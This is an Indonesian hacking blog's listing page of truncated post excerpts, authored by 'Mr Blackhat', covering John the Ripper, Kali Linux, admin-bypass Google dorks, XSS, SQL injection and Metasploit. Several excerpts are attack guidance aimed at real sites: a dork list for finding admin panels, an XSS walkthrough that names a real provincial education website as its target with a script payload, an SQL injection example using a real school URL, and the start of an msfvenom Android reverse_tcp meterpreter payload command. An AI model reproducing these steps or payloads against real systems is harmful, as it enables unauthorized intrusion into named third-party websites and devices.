Postingan

Pengertian John the ripper Dan cara menjalankannya

Gambar
Assalamualaikum wr wb Jumpa dengan saya ridwan Gans oke kali ini kita gak akan tutorial karna tidak Nemu web vuln:v Oke kali kita akan bahas tentang pengertian software John the ripper siapa sih yang gak kenal dengan software yang satu ini John The Ripper  adalah suatu cr acker password yang cepat yang tersedia pada banyak platfom, antara lain UNIX, Windows, DOS, BeOS dan OpenVMS. Tujuan utama dari  John The Ripper adalah untuk mendeteksi kelemahan password pada sistem UNIX (termasuk Linux). Beberapa tips yg akan mempermudah saat menginstal John the Ripper pada windows 1. Simpan di C:/ , jangan di program files maupun folder apapun. 2. Ketika menginstal mungkin akan terlihat seperti C: / John/john1701 / dll Pindahkan semuanya keluar dari folder john1701 dan masuk ke folder pertama. Kemudian hapus john1701. 3. Sekarang ketika Anda masuk ke drive C anda dan membuka folder john, Anda akan melihat kedua folder doc untuk menjalankan, bukan john1701 4. Dalam run f...

Pengertian kali Linux dan kelebihannya

Gambar
Assalamualaikum wr wb Jumpa lagi dengan KBCII Official kali ini kita tidak akan tutorial melainkan kita akan kasih tau pengertian Kali Linux dan kelebihannya baca dan simak Apa itu Linux Kali Linux adalah distro turunan Debian dan juga penerus BackTrack yang digunakan untuk melakukan penetrasi pada jaringan. Kali Linux memiliki ±300 tools yang ada di dalamnya dengan fungsi masing-masing. Kali Linux juga bersifat Live CD dan Installasi manual.   Bagi anda yang baru memasang atau memakai Kali Linux anda harus tau kelebihan kali linux dan OS ini dibuat untuk apa.?? KELEBIHAN DAN FITUR FITUR KALI LINUX Berikut beberapa kelebihan dan keunggulan fitur-fitur dari operasi sistem Kali linux, diantaranya: User-frienly , yaitu dengan tampilan yang dinamis dan nyaman untuk digunakan. Performa yang stabil . Sinkron pada repository Debian bahkan 4 repo sekaligus sehingga paketnya update setiap harinya. Seperti biasanya OS linux  merupakan OS yang aman  dari virus,...

Dork bypass admin 2020

Gambar
Assalamualaikum wr.wb Jumpa lagi dengan saya Mr Blackhat kali ini kita akan ngasih dork bypass admin 2020 Dork : Inurl:login[4"admin"] site: Inurl:admin ["Userlogin"]**site: inurl:/admin.php intext:login intext:adminsitrator inurl:/admin/index.php intext:username inurl :/admin/Admin.php intext:login inurl:/administrator/login.php intext:username site:. inurl:/login.php intext:administrator intext:login inurl:/admin/upoload/ inurl:/admin/login.php/ intitle:Administrator inurl:/admin/login.php intitle: Panel Admin inurl:/admin/login.php site:in inurl / mnux=login kampus inurl / mnux=login akademik inurl / mnux=login powered by sisfo inurl /?mnux=login "powered by sisfo kampus" inurl / mnux=login sisfo kampus inurl / mnux=login admin inurl >:& quot mnux =& quot akademik inurl / mnux=login powered by sisfo inurl :/? mnux login inurl / mnux=login id /?mnux=login&lgn=frm siakad inurl / mnux=login akademik admi...

Cara belajar Xss dengan gampang

Gambar
Assalamualaikum wr.wb Jumpa dengan saya MrBlackhat kali ini kita akan mempelajari cara kerja Xss atau cross site scripting oke kita langsung saja tanpa basa basi Bahan yang kalau perlukan  sebagai berikut: - dork - web vuln - harus buriq - kopi - exploit Dork:disdik/terserah kalian Exploit:<script>prompt(document.domain)</script> Oke langsung saja 1.) Kalian cari target yang kalian inginkan berhubung aku sudah punya target: http://disdik.jabarprov.go.id/ 2.) Kalian cari temapat berita dan pilih salah satu berita yang kalian mau 3.) Dan kalian masukkan <script>prompt(document.domain)</script> di tempat pencarian dan kalian pencet enter. 4.) Dan itulah hasilnya. Sekian dari saya jika ada yang salah mohon di maafkan jika anda ingin bertanya silahkan di kolom komentar Sekian dari saya wassalamualaikum wr.wb

Cara mengetahui celah web menggunakan SQL Injection

Gambar
Assalamualaikum wr.wb Hai kembali lagi dengan saya Mr Blackhat oke kali ini kita akan bahas apa itu  SQL INJECTION  Dan  Bagaimana cara mengetahui celah dalam web dengan SQL INJECTION? APA ITU SQLI/SQL INJECTION? SQL injection  adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah  SQL  yang ada di memori aplikasi client. SQL Injection merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data. Bagaimana cara mengetahui celah web dengan menggunakan SQLI? Hal yang pertama harus di ketahui oleh attacker untuk mengetahui apakah suatu situs terkena celah SQLI atau tidak adalah dengan cara membuat suatu error pada url tersebut,dengan cara menambah karakter (') [tanpa tanda kurung setelah angka/id pada situs tersebut. Contoh url yang memungkinkan terkenah celah SQLI: Web normal  http://www.woodfordps.vic.edu.au/curriculum.php?id=10 Lalu ...

Cara menggunakan metasploit

Gambar
Welcome to  Blogger KBCII INDONESIA Sabtu,21 Maret 2020 Hai guys kembali lagi di Mr blackhat oke kali ini kita akan membahas cara menggunakan metasploit. Tutorial Menggunakan Metasploit Bagi Pemula Assalamualaikum wr.wb. Halo guys kali ini saya akan berbagi tutorial cara menggunakan metasploit di Termux (Android) dan terminal (OS Kali Linux). Oke tanpa basi basi, kita langsung ke tutorialnya Siapkan dulu alat alatnya 1. Metasploit-Framework 2. Koneksi internet 3. Kesabaran :v langkahnya 1. kita buka terminal dahulu 2. Lalu kita ketikkan begini ifconfig untuk melihat alamat ip kita 3. Nah kita sudah mendapatkan alamat ip kita yang  192.168.43.91 . Setelah itu, ketikkan perintah ini "msfvenom -p android/meterpreter/reverse_tcp LHOST= 192.168....

Inilah software di gunakan hacker

Gambar
Ini lah 5 perbedaan software yang di gunakan hacker 1.Nmap Nmap adalah sebuah aplikasi atau tool yang berfungsi untuk melakukan port scanning. Nmap dibuat oleh Gordon Lyon, atau lebih dikenal dengan nama Fyodor Vaskovich. Aplikasi ini digunakan untuk meng-audit jaringan yang ada. 2.Metasploid Metasploit adalah proyek keamanan komputer yang menyediakan informasi tentang kerentanan keamanan dan bantuan dalam pengujian penetrasi dan pengembangan tanda tangan IDS. Itu dimiliki oleh perusahaan keamanan Boston, yang berbasis di Massachusetts, Massachusetts. 3.Linux Linux adalah nama yang diberikan kepada kumpulan sistem operasi Mirip-Unix yang menggunakan Kernel Linux sebagai kernelnya. Linux merupakan proyek perangkat lunak bebas dan sumber terbuka terbesar di dunia.   4.Jhon the ripper John the Ripper adalah alat perangkat lunak peretas kata sandi gratis. Awalnya dikembangkan untuk sistem operasi Unix, sekarang berjalan di lima belas platform yang berbeda (sebelas di antara...